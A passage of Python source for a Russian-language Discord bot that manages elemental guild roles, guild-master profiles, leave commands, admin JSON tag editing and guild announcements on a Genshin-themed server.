msg.edit(embed=models.embed_stan(\n\t\t\t\t\t\tembed=discord.Embed(title=f'Админ-Панель: JSON: {type}: Edit: Success;',\n\t\t\t\t\t\t color=discord.Colour.from_rgb(80, 141, 234))))\n\t\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def delete_json_to_type(type, ctx, msg):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_give_me_a_tag_to_delete = discord.Embed(\n\t\ttitle=f\"Адмни-Панель: JSON: {type}: Delete: Tag;\",\n\t\tdescription=\"Отправьте в чат тег который надо удалить.\",\n\t\tcolor=discord.Colour.from_rgb(80, 141, 234)\n\t)\n\tembed_give_me_a_tag_to_delete = models.embed_stan(embed_give_me_a_tag_to_delete)\n\n\tembed_none_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Такого значения нет в базе данных, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tawait msg.edit(embed=embed_give_me_a_tag_to_delete, view=models.NonBts())\n\ttry:\n\t\ttagN = await bot.wait_for(\"message\", check=check, timeout=30)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type, 
tagN.content)\n\t\tif che is None:\n\t\t\tawait msg.edit(embed=embed_none_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is True:\n\t\t\t\tmodels.delete_tag_in_type(type, tagN.content)\n\t\t\t\tawait msg.edit(embed=models.embed_stan(\n\t\t\t\t\tembed=discord.Embed(title=f'Админ-Панель: JSON: {type}: Edit: Success;',\n\t\t\t\t\t color=discord.Colour.from_rgb(80, 141, 234))), view=models.NonBts())\n\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def json_type_pan(ctx, msg, type: str):\n\tedit = models.EditJson(au=await ctx.guild.fetch_member(ctx.author.id))\n\tembed_type = discord.Embed(title=f'Админ-Панель: JSON: {type};', description=f\"Что надо сделать со всеми {type.lower()}?\", color=discord.Color.from_rgb(80, 141, 234))\n\tembed_type = models.config_roles_file_get_by_type(type, embed_type)\n\n\tawait msg.edit(embed=embed_type, view=edit)\n\n\tawait edit.wait()\n\n\tif edit.value is None:\n\t\tawait msg.delete()\n\n\telif edit.value == \"EDIT\":\n\t\tawait edit_json_type(ctx, msg, type)\n\n\telif edit.value == \"ADD\":\n\t\tawait add_json_to_type(ctx, msg, type)\n\n\telif edit.value == \"DELETE\":\n\t\tawait delete_json_to_type(type, ctx, msg)\n\n\telif edit.value == \"BACK\":\n\t\tawait json_pan(ctx, msg)\n\n\telif edit.value == \"STOP\":\n\t\tawait msg.delete()\n\n\telse:\n\t\tpass\n\n\n# -----------------------------------------------------------------------------\n\n# Админ-Команды\n\n@bot.command(name=\"ap\")\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\nasync def admin_panel(ctx):\n\tawait main(ctx)\n\n\n# -----------------------------------------------------------------------------\n\n# Юзер-Команды\n\n# User-Profile\n\nasync def get_guild(ctx, need: int):\n\tuser = ctx.author\n\n\tasync def all_guilds():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\tr = guild.get_role(r)\n\n\t\t\tobj.append(r.id)\n\n\t\treturn obj\n\n\tasync def all_Gmasters():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{gui.lower()}\")\n\t\t\tr = guild.get_role(r)\n\t\t\tobj.append(r.id)\n\n\t\treturn obj\n\n\tasync def all_Gvisions():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\twith open(\"additional_files/config_file.json\", \"r\") as file:\n\t\t\t\tfile = json.load(file)\n\n\t\t\ttim = file[\"TIME_ROLE\"]\n\n\t\t\tfor key in tim:\n\t\t\t\tif key.startswith(\"guild-vision\"):\n\t\t\t\t\tobj.append(tim[key])\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\treturn obj\n\n\trol = await all_guilds()\n\n\tgms = await all_Gmasters()\n\n\tgvs = await all_Gvisions()\n\n\tlvl = await access_lvl(ctx=ctx)\n\n\tlist = []\n\n\tif lvl != need:\n\t\treturn \"Error loading profile\"\n\telse:\n\t\tif lvl and need == 0:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in rol:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two user 
roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\n\t\telif lvl and need == 1:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in gms:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two guild-master roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\n\t\telif lvl and need == 2:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in gvs:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two guild-vision roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\t\telse:\n\t\t\t\"Error in access lvl!\"\n\n\n# Профиль для первого уровня доступа.\nasync def user_profile(ctx=None, msg=None, user=None):\n\tawait nope(ctx=ctx, msg=msg, page_name=\"Профили для всех!\", what_will_be_on_this_page=\"Профили для всех юзеров.\")\n\n\n# Профиль для второго уровня доступа.\n\n\nclass GmasterNotDefined(Exception):\n\n\tdef __init__(self, msg=None):\n\t\tself.msg = msg if msg else \"Гильд мастер не обнаружен, требуется вмешательство в код или стороннее действие со стороны Client.\"\n\n\tdef __str__(self):\n\t\treturn self.msg\n\n\tdef __repr__(self):\n\t\treturn \"Экземпляр класса GmasterNotDefined\"\n\n\nclass GuildMaster:\n\n\tdef __init__(self, ctx):\n\n\t\tself.ctx = ctx\n\t\t#\n\t\tself.user = ctx.author\n\t\tself.guild: str = self.define_master(self.user) if self.define_master(self.user) is not None else \"Unknown\"\n\n\tdef __str__(self) -> str:\n\t\treturn f\"{self.user} -> {self.guild}-master\"\n\n\tdef __repr__(self):\n\t\tname = self.__class__.__name__\n\t\t# @ToDo master = self.user\n\t\treturn (\n\t\t\tf\"<{name} ctx={self.ctx} master={self.guild} guild={self.guild}>\"\n\t\t)\n\n\t@classmethod\n\tdef define_master(cls, user) -> str:\n\t\tall_guilds: dict = models.NEDOGUILD().get_all_guilds()\n\n\t\tfor guild in all_guilds.keys():\n\t\t\tserver = bot.get_guild(794987714310045727)\n\t\t\t#\n\t\t\t#\n\t\t\trole = all_guilds[guild][\"guild_master_role\"]\n\t\t\t#\n\t\t\trole = server.get_role(role)\n\n\t\t\tif role in user.roles:\n\t\t\t\treturn str(guild.split(\"_\")[1])\n\n\tasync def __get_msg(self, wait: int, wait_for: discord.Embed, message: discord.Message = None) -> discord.Message or None:\n\t\tdef check(message):\n\t\t\treturn message.author == self.user and message.channel == self.ctx.channel\n\n\t\ttry:\n\n\t\t\tdsc = wait_for.description\n\n\t\t\tw = f\"\\n\\n\\n\\n**__Я буду ждать лишь {wait} секунд...__**\"\n\n\t\t\twait_for.description = dsc + w\n\n\t\t\tawait message.edit(embed=wait_for, view=models.NonBts())\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"Exception in get_msg \\n {exc}\")\n\t\t\traise LookupError() from exc\n\t\ttry:\n\n\t\t\twait_for_msg = await bot.wait_for(\"message\", check=check, timeout=wait)\n\n\t\texcept asyncio.exceptions.TimeoutError:\n\t\t\treturn None\n\t\telse:\n\t\t\treturn wait_for_msg\n\n\tasync def __define_user(self, msg: discord.Message) -> discord.User or discord.Member:\n\n\t\tembed_which_user_to_kick = discord.Embed(title=\"Кого?\", description=\"@упомяни юзера которого надо которым надо произвести некие действа.\", color=standard_color)\n\t\tembed_which_user_to_kick = models.embed_stan(embed_which_user_to_kick)\n\n\t\tuser_: discord.Message = await self.__get_msg(wait=45, wait_for=embed_which_user_to_kick, 
message=msg)\n\n\t\tif user_ is None:\n\n\t\t\tawait msg.delete()\n\n\t\telse:\n\t\t\tawait user_.delete()\n\t\t\ttry:\n\t\t\t\tuser_id = re.findall(r\"\\d+\", str(user_.content))[0]\n\t\t\t\tif len(str(user_id)) != 18:\n\t\t\t\t\traise UserWarning\n\n\t\t\t\telse:\n\t\t\t\t\tuser: discord.Member = await self.ctx.guild.fetch_member(int(user_id))\n\t\t\texcept Exception as exc:\n\t\t\t\traise UserWarning(exc) from exc\n\t\t\telse:\n\t\t\t\treturn user\n\n\t@classmethod\n\tasync def kick(cls, **kwargs):\n\t\tguild = kwargs.get(\"guild\")\n\t\tctx: com.Context = kwargs.get(\"ctx\")\n\t\tgt = kwargs.get(\"gt\")\n\t\tmsg: discord.Message = kwargs.get(\"msg\")\n\n\t\tuser: discord.Member = await gt.__define_user(msg=msg) if kwargs.get(\"user\", None) is None else kwargs.get(\"user\", None)\n\n\t\tguild_role_id = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = ctx.guild.get_role(guild_role_id)\n\n\t\tawait user.trigger_typing()\n\n\t\tif guild_role in user.roles:\n\t\t\tawait user.remove_roles(guild_role, reason=\"По приказу генерала гафса\")\n\t\t\tresult = f\"{user.mention} исключен из гильдии {guild}.\"\n\t\t\tcol = discord.Color.green()\n\n\t\t\tdefense = GuildDefense(bot=bot, server=ctx.guild, user=user.id, guild=guild)\n\n\t\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 2) # кулдаун на 2 дня\n\n\t\telse:\n\t\t\tresult = f\"{user.mention} не был исключен из гильдии {guild}, так как в ней и не находился.\"\n\t\t\tcol = discord.Color.red()\n\n\t\tembed_success = models.embed_stan(embed=discord.Embed(title=\"Готово\", description=result, color=col))\n\n\t\tawait msg.edit(embed=embed_success)\n\t\tawait ctx.channel.trigger_typing()\n\t\tawait asyncio.sleep(4)\n\t\tawait gt.get_profile(msg)\n\n\tasync def __chdc(self, msg):\n\t\tembed__ = discord.Embed(title=\"На что изменим?\", description=\"Максимально напряги свои мозги и включи воображение, а затем напиши в чат то, что придумал.\", color=standard_color)\n\t\tembed__ = models.embed_stan(embed__)\n\n\t\tnew_topic: discord.Message = await self.__get_msg(wait=45, wait_for=embed__, message=msg)\n\n\t\tif new_topic is None:\n\t\t\tawait msg.delete()\n\t\telse:\n\t\t\tawait new_topic.delete()\n\t\t\ttopic = f\"{new_topic.content}\"\n\n\t\t\ttry:\n\t\t\t\tguild_channel: discord.TextChannel = await self.ctx.guild.fetch_channel(models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"channel\"))\n\t\t\texcept Exception as exc:\n\t\t\t\tawait something_went_wrong(msg=msg, problem=str(exc))\n\t\t\t\traise discord.Forbidden\n\t\t\telse:\n\t\t\t\tawait guild_channel.edit(reason=\"По приказу генерала гафса!\", topic=topic)\n\n\t\t\tif (str(new_topic.content) == str(models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"guild_chat_description\"))):\n\t\t\t\tresult = \"Тема канала не была изменена, ведь новая <<{}>> идентична старой.\"\n\t\t\t\tcolor = discord.Color.red()\n\t\t\telse:\n\t\t\t\tresult = \"Тема канала успешно изменена на {}.\"\n\t\t\t\tcolor = discord.Color.green()\n\n\t\t\tembed_success = discord.Embed(title=\"Готово\", description=result.format(topic), color=color)\n\n\t\t\tawait msg.edit(embed=embed_success, view=models.NonBts())\n\n\t\t\tawait self.ctx.channel.trigger_typing()\n\n\t\t\tawait asyncio.sleep(5)\n\n\t\t\tawait self.get_profile(msg)\n\n\tasync def __chte(self, msg):\n\t\tembed__ = discord.Embed(title=\"На что изменим?\", description=\"Максимально напряги свои мозги и включи воображение, а затем напиши в чат то, что придумал.\", color=standard_color)\n\t\tembed__ = 
models.embed_stan(embed__)\n\n\t\tnew_text: discord.Message = await self.__get_msg(wait=180, wait_for=embed__, message=msg)\n\n\t\tif new_text is None:\n\t\t\tawait msg.delete()\n\t\telse:\n\t\t\tawait new_text.delete()\n\t\t\told_text: str = models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"campaign_speech\")\n\n\t\t\ttry:\n\t\t\t\tif (str(new_text.content).lower() == old_text.lower()):\n\t\t\t\t\tresult: str = \"**Агитационная речь не была изменена**\\n\" \\\n\t\t\t\t\t \"**Старая речь идентична новой**: \\n\\n\\n {}\".format(new_text.content)\n\t\t\t\t\tcolor: discord.Color = discord.Color.red()\n\t\t\t\t\ttime_wait: int = 5\n\t\t\t\telse:\n\t\t\t\t\tnew_text: str = models.NEDOGUILD().update_one_tag(guild=self.guild, tag=\"campaign_speech\", new_value=new_text.content)\n\t\t\t\t\tresult: str = \"**Агитационная речь была изменена на**: \\n\\n\\n {}\".format(new_text)\n\t\t\t\t\tcolor: discord.Color = discord.Color.green()\n\t\t\t\t\ttime_wait: int = 10\n\n\t\t\t\t#\n\t\t\t\t# END\n\t\t\t\t#\n\t\t\t\tembed_ = discord.Embed(title=\"Готово\", description=result, color=color)\n\t\t\t\tawait msg.edit(embed=embed_, view=models.NonBts())\n\n\t\t\t\tawait self.ctx.trigger_typing()\n\n\t\t\t\tawait asyncio.sleep(time_wait)\n\n\t\t\t\tawait self.get_profile(message=msg)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tawait something_went_wrong(msg=msg, problem=str(exc))\n\n\tasync def get_profile(self, message=None) -> None:\n\t\tif self.guild == \"Unknown\":\n\t\t\traise GmasterNotDefined\n\n\t\tprofile_embed = models.embed_stan(embed=discord.Embed(\n\t\t\ttitle=\"User-Profiles: Gmaster: Profile;\",\n\t\t\tdescription=f\"У меня есть много способов угандошить {self.guild}, какой хочешь применить?\",\n\t\t\tcolor=standard_color))\n\n\t\tbuttons = models.ButtonsForGmasters(au=self.user)\n\n\t\tif message is None:\n\t\t\tprofile_message: discord.Message = await self.ctx.send(embed=profile_embed, view=buttons)\n\t\telse:\n\t\t\tprofile_message: discord.Message = await message.edit(embed=profile_embed, view=buttons)\n\n\t\tawait buttons.wait()\n\t\tbuttons_value = buttons.value\n\n\t\tif buttons_value == \"KICK\":\n\t\t\tawait self.kick(ctx=self.ctx, guild=self.guild, gt=self, msg=profile_message)\n\n\t\telif buttons_value == \"CHDC\":\n\t\t\tawait self.__chdc(message)\n\n\t\telif buttons_value == \"SPRA\":\n\t\t\tawait self.__chte(msg=message)\n\n\t\telse:\n\t\t\ttry:\n\t\t\t\tawait profile_message.delete()\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(f\"Deleting message exception {exc} GuildMaster -> get_profile\")\n\n\n# @bot.command()\n# async def chncm(ctx: com.Context):\n# \toverwrites = {\n# \t\tctx.author: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# \t\tbot.user: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# \t\tctx.guild.default_role: discord.PermissionOverwrite(view_channel=False, send_messages=False),\n# \t}\n#\n# \tc = await ctx.guild.create_text_channel(\n# \t\tposition=0,\n# \t\tcategory=ctx.channel.category,\n# \t\tname=f\"Ливы\",\n# \t\toverwrites=overwrites,\n# \t\treason=\"По приказу генерала гафса\",\n# \t\ttopic=f\"Канал для юзеров по тихому ушедших из гильдии...\",\n# \t\tslowmode_delay=1\n#\n# \t)\n#\n# \tawait c.send(f\"{ctx.author.mention}\")\n\n@bot.command(\n\tname=\"leave\",\n\taliases=[\n\t\t\"выйти\",\n\t\t\"покинуть\",\n\t\t\"аривидерчи\",\n\t\t\"бай\",\n\t\t\"лив\",\n\t\t\"люблю-гей-дорамы\",\n\n\t\t# 
transcript\n\t\t\"выйtи\",\n\t\t\"пokинуть\",\n\t\t\"aривидерчи\",\n\t\t\"бaй\",\n\t\t\"лNв\",\n\t\t\"люbлю-гeй-дoрaмы\"\n\t]\n)\nasync def leave(ctx):\n\tdef define_guild(user: nextcord.Member):\n\t\tall_guilds: dict = models.NEDOGUILD().get_all_guilds()\n\n\t\tfor guild in all_guilds.keys():\n\t\t\tserver = bot.get_guild(794987714310045727)\n\t\t\t#\n\t\t\t#\n\t\t\trole = all_guilds[guild][\"role\"]\n\t\t\t#\n\t\t\trole = server.get_role(role)\n\n\t\t\tif role in user.roles:\n\t\t\t\treturn str(guild.split(\"_\")[1])\n\n\t\treturn None\n\n\tguild = define_guild(ctx.author)\n\tctx: com.Context = ctx\n\n\tuser: discord.Member = ctx.author\n\n\tawait user.trigger_typing()\n\n\tif guild is not None:\n\t\tguild_role_id = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = ctx.guild.get_role(guild_role_id)\n\t\tawait user.remove_roles(guild_role, reason=\"По приказу генерала гафса\")\n\n\t\tdefense = GuildDefense(bot=bot, server=ctx.guild, user=user.id, guild=guild)\n\n\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 2) # кулдаун на 2 дня\n\n\t\tawait ctx.guild.get_channel(972510360710037564).send(\n\t\t\tcontent=f\"{ctx.guild.get_role(models.NEDOGUILD().get_one_tag(guild=guild, tag='guild_master_role')).mention}\",\n\t\t\tembed=models.embed_stan(\n\t\t\t\tembed=nextcord.Embed(\n\t\t\t\t\ttitle=\"ГМа предали!\",\n\t\t\t\t\tdescription=f\"Этот \\*\\*\\*а\\*\\*\\с -> {user.mention} <- решил уйти по-тихому из {guild}!\",\n\t\t\t\t\tcolor=discord.Color.red()\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\t\tresult = f\"{user.mention} исключен из гильдии {guild}.\"\n\t\tcol = discord.Color.green()\n\n\n\n\n\telse:\n\t\tresult = f\"{user.mention} не был исключен из гильдии так как в ней и не находился.\"\n\t\tcol = discord.Color.red()\n\n\tembed_success = models.embed_stan(embed=discord.Embed(title=\"Готово\", description=result, color=col))\n\n\tawait ctx.send(\n\t\tembed=embed_success,\n\t\tdelete_after=60,\n\t)\n\n\n@bot.command()\n@com.has_any_role(929552483808858132)\nasync def update_guild_database_now(ctx):\n\tserver = ctx.guild\n\n\tasync def all_guilds():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tobj = {}\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\tr = guild.get_role(r)\n\t\t\tc = models.get_tag_value(\"CHANNEL\", f\"channel_{gui}\")\n\t\t\tc = await guild.fetch_channel(c)\n\n\t\t\tobj[f\"{gui}\"] = {\n\t\t\t\t\"r\": r,\n\t\t\t\t\"c\": c\n\t\t\t}\n\n\t\treturn obj\n\n\tasync def get_Gmaster(guild) -> dict:\n\n\t\tguild_master_role_id = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{guild}\")\n\n\t\tguild_master_role = server.get_role(guild_master_role_id)\n\t\ttry:\n\t\t\tguild_master_user = guild_master_role.members[0]\n\t\texcept Exception as e:\n\t\t\tLOGGER.error(f\"ОШИБКА В get_Gmaster в НЕ НАЙДЕН ГМ {guild}, ПОДСТАВЛЕН АВАКУСУ\"\n\t\t\t f\"! 
\\n\" + str(e))\n\n\t\t\tguild_master_user = server.get_member(361198710551740428)\n\t\treturn {\"role\": guild_master_role, \"user\": guild_master_user}\n\n\talgs = await all_guilds()\n\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\tg = models.NEDOGUILD()\n\n\tdef get_channel(guild):\n\t\treturn server.get_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild}\"))\n\n\tfor guild in gs:\n\t\tgmstr: dict = await get_Gmaster(guild)\n\t\tchat = get_channel(guild)\n\t\tg.create_guild_settings(agi=\"#\", guild=guild, users=len(algs[guild]['r'].members), role=algs[guild]['r'].id, guild_master=gmstr[\"user\"].id, guild_chat_description=chat.topic, channel=chat.id,\n\t\t guild_master_role=gmstr[\"role\"].id)\n\n\nasync def Gmaster_profile(ctx=None, msg=None) -> None:\n\ttry:\n\t\ttry:\n\t\t\tawait ctx.message.delete()\n\t\texcept discord.Forbidden:\n\t\t\tpass\n\t\texcept discord.NotFound:\n\t\t\tpass\n\t\texcept discord.HTTPException:\n\t\t\tpass\n\n\t\tmaster = GuildMaster(ctx=ctx)\n\t\tif master.guild.lower() == \"Unknown\".lower():\n\t\t\tLOGGER.info(\"G-master non defined\")\n\n\t\tawait master.get_profile(message=msg)\n\n\texcept LookupError or Exception as exc:\n\t\treturn await something_went_wrong(msg, f\"{exc}\")\n\texcept UserWarning as exc:\n\t\treturn await something_went_wrong(msg, f\"Не удалось определить юзера {exc}\")\n\tfinally:\n\t\tLOGGER.debug(\"Called the G-master profile\")\n\n\n# Профиль для третьего уровня доступа.\nasync def Gvision_profile(ctx=None, msg=None, user=None):\n\tuser = ctx.author if user is None else user == user\n\tif await access_lvl(user_=user) == 2:\n\t\t# Эмбед с выбором чё сделать типа\n\t\tembed_c_m_p = discord.Embed(title='User-Profiles: Gvision: Profile;', description=\"Выберите что вам необходимо с помощью кнопок ниже, все режимы представлены ниже.\", color=standard_color)\n\t\tembed_c_m_p = models.embed_stan(embed_c_m_p)\n\n\t\tGvision = models.Gvision(au=await ctx.guild.fetch_member(ctx.author.id))\n\n\t\tawait msg.edit(embed=embed_c_m_p, view=Gvision)\n\n\t\tawait Gvision.wait()\n\n\t\tres = Gvision.value\n\n\t\tif res == \"LOGS\":\n\t\t\tawait logs(ctx, msg)\n\n\t\telif res == \"MSGS\":\n\t\t\tawait msgs(ctx, msg)\n\n\t\telif res == \"STAT\":\n\t\t\tawait stat(ctx, msg)\n\n\t\telif res == \"EDIT\":\n\t\t\tawait mana(ctx, msg)\n\t\telse:\n\t\t\tif res == \"STOP\" or res is None:\n\t\t\t\tawait msg.delete()\n\telse:\n\t\tawait something_went_wrong(msg=msg, problem=\"Ошибка определения уровня доступа.\")\n\n\n# ---------------------------------------------------------------------------\n\n@bot.command()\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\n@com.cooldown(rate=1, per=5, type=com.BucketType.user)\nasync def members(ctx, role: discord.Role):\n\tacc_lvl = await access_lvl(ctx=ctx)\n\tcracks = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\tcount = 1\n\ttext = \"\\n\"\n\tif acc_lvl >= 1:\n\t\tembed_users = discord.Embed(title=\"#\", description=\"#\", color=standard_color)\n\n\t\tfor member in role.members:\n\t\t\ttext += f\"{count}. 
{member.mention}({member.id})\\n\"\n\t\t\tif count in cracks:\n\t\t\t\ttext += \"---\"\n\t\t\tcount += 1\n\n\t\ttexts = text.split(\"---\")\n\n\t\tfor t in texts:\n\t\t\tawait ctx.send(t)\n\n\n@members.error\nasync def error(ctx, error):\n\tif isinstance(error, com.MissingRequiredArgument):\n\t\tawait ctx.send(\"Не указана роль, пожалуйста укажите роль!\")\n\telif isinstance(error, com.CommandOnCooldown):\n\t\tawait ctx.send(f\"Команда откатывается, подожди {error.retry_after:.2f}с!\")\n\telse:\n\t\tawait ctx.send(str(error))\n\n\n# Функции для третьего уровня доступа\nasync def logs(ctx, msg):\n\tawait nope(ctx, msg, page_name=\"Логи\", what_will_be_on_this_page=\"Логи\")\n\n\nasync def msgs(ctx, msg):\n\tembed_guild_s_cho = discord.Embed(title='User-Profiles: Gvision: Profile: Msgs;', description=\"Нажмите на одну из кнопок представленных ниже.\", color=standard_color)\n\tembed_guild_s_cho = models.embed_stan(embed_guild_s_cho)\n\n\tmsgs = models.Msgs(au=await ctx.guild.fetch_member(ctx.author.id))\n\n\tawait msg.edit(embed=embed_guild_s_cho, view=msgs)\n\n\tawait msgs.wait()\n\n\tval = msgs.value\n\n\tif val == \"ONEG\":\n\t\tawait msgs_one(ctx, msg)\n\n\telif val == \"ALLG\":\n\t\tawait msgs_many(ctx, msg)\n\n\telif val == \"BACK\":\n\t\tawait return_profile(ctx, msg)\n\n\telif val == \"STOP\" or val is None:\n\t\tawait msg.delete()\n\n\nasync def message(title, desc, ping, pin, guild_obj, ctx):\n\tif ping.lower() in (\"yes\", \"да\", \"конечно\", \"ага\"):\n\t\tping_ = guild_obj['role'].mention\n\telse:\n\t\tping_ = \"\"\n\n\tembed = discord.Embed(title=title, description=f\"Уведомление для всех {guild_obj['role'].mention} от {ctx.author.mention}. **Читайте внимательно**!\\n\\n\\n{desc}\", color=standard_color)\n\n\tembed = models.embed_stan(embed)\n\n\tmsg = await guild_obj['channel'].send(content=ping_, embed=embed)\n\n\tif pin.lower() in (\"yes\", \"да\", \"конечно\", \"ага\"):\n\t\ttry:\n\t\t\tawait msg.pin()\n\t\texcept Exception:\n\t\t\tpass\n\telse:\n\t\tpass\n\n\treturn {\"title\": title,\n\t \"desc\": desc,\n\t \"ping\": ping,\n\t \"pin:\": pin,\n\t \"guild_obj\": guild_obj,\n\n\t }\n\n\nasync def msgs_one(ctx, msg):\n\ttry:\n\t\tasync def give_me_message(ctx, msg, sho: str, time_wait: int):\n\t\t\tdef check(msg):\n\t\t\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\t\t\tembed_give_me = discord.Embed(title='Система сбора данных \"Ук��аїнський хакер Вiталя\"', description=f\"Напишите в чат {sho}\", color=standard_color)\n\t\t\tembed_give_me = models.embed_stan(embed_give_me)\n\n\t\t\tembed_you_do_not_s = discord.Embed(title='Система сбора данных', description=f\"Вы не написали в чат '{sho}'. 
\\nПереношу вас на прежнюю страницу.\", color=standard_color)\n\t\t\tembed_you_do_not_s = models.embed_stan(embed_you_do_not_s)\n\n\t\t\tawait msg.edit(embed=embed_give_me, view=models.NonBts())\n\n\t\t\ttry:\n\t\t\t\tvalue = await bot.wait_for(\"message\", check=check, timeout=time_wait)\n\t\t\texcept TimeoutError:\n\t\t\t\tawait msg.edit(embed=embed_you_do_not_s)\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait msgs(ctx, msg)\n\t\t\telse:\n\t\t\t\tawait value.delete()\n\t\t\t\treturn value.content\n\n\t\tasync def return_guild(guild: str):\n\t\t\tlist_of_guilds = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\t\tguild_after_for = None\n\n\t\t\tfor gui in list_of_guilds:\n\t\t\t\tif gui.lower() == guild.lower():\n\t\t\t\t\tguild_after_for = gui\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t\tif guild_after_for is None:\n\t\t\t\tawait something_went_wrong(msg, \"была введена несуществующая гильдия, возможна ошибка внутри скрипта.\")\n\t\t\telse:\n\t\t\t\tguild = await bot.fetch_guild(794987714310045727)\n\t\t\t\tguild_object = {\n\t\t\t\t\t\"role\": guild.get_role(models.get_tag_value(\"ROLE\", f\"role_{guild_after_for}\")),\n\t\t\t\t\t\"channel\": await guild.fetch_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild_after_for}\"))\n\n\t\t\t\t}\n\t\t\t\treturn guild_object\n\n\t\tguild_str = await give_me_message(ctx, msg, \"гильдию в которую надо отправить сообщение.\", 20)\n\t\ttitle_str = await give_me_message(ctx, msg, \"заголовок для сообщения.\", 20)\n\t\tmainTXT_str = await give_me_message(ctx, msg, \"основной текст сообщения.\", 300)\n\t\tpin_str = await give_me_message(ctx, msg, \"надо ли закреплять сообщение.\", 20)\n\t\tping_str = await give_me_message(ctx, msg, \"надо ли пинговать всю гильдию.\", 20)\n\n\t\tmessage_returns = await message(ctx=ctx, title=title_str, guild_obj=await return_guild(guild_str), desc=mainTXT_str, pin=pin_str, ping=ping_str)\n\n\t\tawait msgs(ctx, msg)\n\n\texcept BotMissingPermissions as bmp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{bmp}\")\n\texcept MissingPermissions as mp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{mp}\")\n\texcept Exception as e:\n\t\tawait something_went_wrong(msg=msg)\n\t\tLOGGER.error(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в одну гильдию: 